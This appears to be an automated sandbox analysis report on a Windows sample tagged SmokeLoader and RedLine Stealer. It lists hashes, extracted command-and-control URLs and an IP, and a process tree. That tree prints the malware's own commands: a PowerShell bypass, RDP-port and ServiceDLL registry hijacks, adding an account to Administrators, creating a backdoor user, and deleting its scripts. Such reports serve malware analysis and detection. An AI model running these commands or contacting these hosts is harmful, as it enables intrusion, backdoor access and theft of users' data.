Analysis
-
max time kernel
152s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 08:50
Static task
static1
Behavioral task
behavioral1
Sample
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
Resource
win10-en-20211208
General
-
Target
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
-
Size
218KB
-
MD5
329096f5fae6abed39a7d88c40544c0a
-
SHA1
c47cecb7581b713d9c188f250792752d73b56d01
-
SHA256
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070
-
SHA512
39a175130232ce0c4d0cd96112dcb641abadad39f6d7ac7e072be53a2a8c3e6a9a42233ee5cd81b8c2537c35ca5bb059b903fef572746ee9975d0d1e349e3b8a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7904.exe family_redline C:\Users\Admin\AppData\Local\Temp\7904.exe family_redline behavioral1/memory/1228-133-0x0000000001210000-0x000000000127C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 92 3672 powershell.exe 94 3672 powershell.exe 95 3672 powershell.exe 96 3672 powershell.exe 99 3672 powershell.exe 101 3672 powershell.exe 103 3672 powershell.exe 105 3672 powershell.exe 107 3672 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
7904.exe98A3.exeD4A3.exepid process 3340 7904.exe 1228 98A3.exe 2272 D4A3.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3040 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2096 2096 -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
98A3.exepid process 1228 98A3.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rfy4dlys.vyg.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C39.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sxb3mk2z.r25.ps1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C3A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2BDA.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C29.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C4B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 94 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exepid process 3920 ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe 3920 ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3040 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 608 608 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exepid process 3920 ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeIncreaseQuotaPrivilege 4080 powershell.exe Token: SeSecurityPrivilege 4080 powershell.exe Token: SeTakeOwnershipPrivilege 4080 powershell.exe Token: SeLoadDriverPrivilege 4080 powershell.exe Token: SeSystemProfilePrivilege 4080 powershell.exe Token: SeSystemtimePrivilege 4080 powershell.exe Token: SeProfSingleProcessPrivilege 4080 powershell.exe Token: SeIncBasePriorityPrivilege 4080 powershell.exe Token: SeCreatePagefilePrivilege 4080 powershell.exe Token: SeBackupPrivilege 4080 powershell.exe Token: SeRestorePrivilege 4080 powershell.exe Token: SeShutdownPrivilege 4080 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeSystemEnvironmentPrivilege 4080 powershell.exe Token: SeRemoteShutdownPrivilege 4080 powershell.exe Token: SeUndockPrivilege 4080 powershell.exe Token: SeManageVolumePrivilege 4080 powershell.exe Token: 33 4080 powershell.exe Token: 34 4080 powershell.exe Token: 35 4080 powershell.exe Token: 36 4080 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeIncreaseQuotaPrivilege 2820 powershell.exe Token: SeSecurityPrivilege 2820 powershell.exe Token: SeTakeOwnershipPrivilege 2820 powershell.exe Token: SeLoadDriverPrivilege 2820 powershell.exe Token: SeSystemProfilePrivilege 2820 powershell.exe Token: SeSystemtimePrivilege 2820 powershell.exe Token: SeProfSingleProcessPrivilege 2820 powershell.exe Token: SeIncBasePriorityPrivilege 2820 powershell.exe Token: SeCreatePagefilePrivilege 2820 powershell.exe Token: SeBackupPrivilege 2820 powershell.exe Token: SeRestorePrivilege 2820 powershell.exe Token: SeShutdownPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeSystemEnvironmentPrivilege 2820 powershell.exe Token: SeRemoteShutdownPrivilege 2820 powershell.exe Token: SeUndockPrivilege 2820 powershell.exe Token: SeManageVolumePrivilege 2820 powershell.exe Token: 33 2820 powershell.exe Token: 34 2820 powershell.exe Token: 35 2820 powershell.exe Token: 36 2820 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeIncreaseQuotaPrivilege 3456 powershell.exe Token: SeSecurityPrivilege 3456 powershell.exe Token: SeTakeOwnershipPrivilege 3456 powershell.exe Token: SeLoadDriverPrivilege 3456 powershell.exe Token: SeSystemProfilePrivilege 3456 powershell.exe Token: SeSystemtimePrivilege 3456 powershell.exe Token: SeProfSingleProcessPrivilege 3456 powershell.exe Token: SeIncBasePriorityPrivilege 3456 powershell.exe Token: SeCreatePagefilePrivilege 3456 powershell.exe Token: SeBackupPrivilege 3456 powershell.exe Token: SeRestorePrivilege 3456 powershell.exe Token: SeShutdownPrivilege 3456 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeSystemEnvironmentPrivilege 3456 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 3040 3040 3040 3040 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3040 3040 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
D4A3.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3040 wrote to memory of 3340 3040 7904.exe PID 3040 wrote to memory of 3340 3040 7904.exe PID 3040 wrote to memory of 3340 3040 7904.exe PID 3040 wrote to memory of 1228 3040 98A3.exe PID 3040 wrote to memory of 1228 3040 98A3.exe PID 3040 wrote to memory of 1228 3040 98A3.exe PID 3040 wrote to memory of 2272 3040 D4A3.exe PID 3040 wrote to memory of 2272 3040 D4A3.exe PID 2272 wrote to memory of 2080 2272 D4A3.exe powershell.exe PID 2272 wrote to memory of 2080 2272 D4A3.exe powershell.exe PID 2080 wrote to memory of 3788 2080 powershell.exe csc.exe PID 2080 wrote to memory of 3788 2080 powershell.exe csc.exe PID 3788 wrote to memory of 352 3788 csc.exe cvtres.exe PID 3788 wrote to memory of 352 3788 csc.exe cvtres.exe PID 2080 wrote to memory of 2356 2080 powershell.exe csc.exe PID 2080 wrote to memory of 2356 2080 powershell.exe csc.exe PID 2356 wrote to memory of 2204 2356 csc.exe cvtres.exe PID 2356 wrote to memory of 2204 2356 csc.exe cvtres.exe PID 2080 wrote to memory of 4080 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 4080 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 2820 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 2820 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 3456 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 3456 2080 powershell.exe powershell.exe PID 2080 wrote to memory of 1672 2080 powershell.exe reg.exe PID 2080 wrote to memory of 1672 2080 powershell.exe reg.exe PID 2080 wrote to memory of 2680 2080 powershell.exe reg.exe PID 2080 wrote to memory of 2680 2080 powershell.exe reg.exe PID 2080 wrote to memory of 1852 2080 powershell.exe reg.exe PID 2080 wrote to memory of 1852 2080 powershell.exe reg.exe PID 2080 wrote to memory of 2144 2080 powershell.exe net.exe PID 2080 wrote to memory of 2144 2080 powershell.exe net.exe PID 2144 wrote to memory of 2752 2144 net.exe net1.exe PID 2144 wrote to memory of 2752 2144 net.exe net1.exe PID 2080 wrote to memory of 1904 2080 powershell.exe cmd.exe PID 2080 wrote to memory of 1904 2080 powershell.exe cmd.exe PID 1904 wrote to memory of 796 1904 cmd.exe cmd.exe PID 1904 wrote to memory of 796 1904 cmd.exe cmd.exe PID 796 wrote to memory of 1236 796 cmd.exe net.exe PID 796 wrote to memory of 1236 796 cmd.exe net.exe PID 1236 wrote to memory of 2936 1236 net.exe net1.exe PID 1236 wrote to memory of 2936 1236 net.exe net1.exe PID 2080 wrote to memory of 348 2080 powershell.exe cmd.exe PID 2080 wrote to memory of 348 2080 powershell.exe cmd.exe PID 348 wrote to memory of 3076 348 cmd.exe cmd.exe PID 348 wrote to memory of 3076 348 cmd.exe cmd.exe PID 3076 wrote to memory of 1812 3076 cmd.exe net.exe PID 3076 wrote to memory of 1812 3076 cmd.exe net.exe PID 1812 wrote to memory of 1896 1812 net.exe net1.exe PID 1812 wrote to memory of 1896 1812 net.exe net1.exe PID 1220 wrote to memory of 2512 1220 cmd.exe net.exe PID 1220 wrote to memory of 2512 1220 cmd.exe net.exe PID 2512 wrote to memory of 896 2512 net.exe net1.exe PID 2512 wrote to memory of 896 2512 net.exe net1.exe PID 4080 wrote to memory of 2204 4080 cmd.exe net.exe PID 4080 wrote to memory of 2204 4080 cmd.exe net.exe PID 2204 wrote to memory of 3108 2204 net.exe net1.exe PID 2204 wrote to memory of 3108 2204 net.exe net1.exe PID 1912 wrote to memory of 3280 1912 cmd.exe net.exe PID 1912 wrote to memory of 3280 1912 cmd.exe net.exe PID 3280 wrote to memory of 3920 3280 net.exe net1.exe PID 3280 wrote to memory of 3920 3280 net.exe net1.exe PID 660 wrote to memory of 1480 660 cmd.exe net.exe PID 660 wrote to memory of 1480 660 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe"C:\Users\Admin\AppData\Local\Temp\ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7904.exeC:\Users\Admin\AppData\Local\Temp\7904.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\98A3.exeC:\Users\Admin\AppData\Local\Temp\98A3.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\D4A3.exeC:\Users\Admin\AppData\Local\Temp\D4A3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jebw35gm\jebw35gm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA5C.tmp" "c:\Users\Admin\AppData\Local\Temp\jebw35gm\CSCA34C6D16E06431187B19D3288333D34.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uhjglvzx\uhjglvzx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF009.tmp" "c:\Users\Admin\AppData\Local\Temp\uhjglvzx\CSC3ECE22E97D764CCA9FFEF0369F48FCA0.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 3JUsl8wO /add1⤵
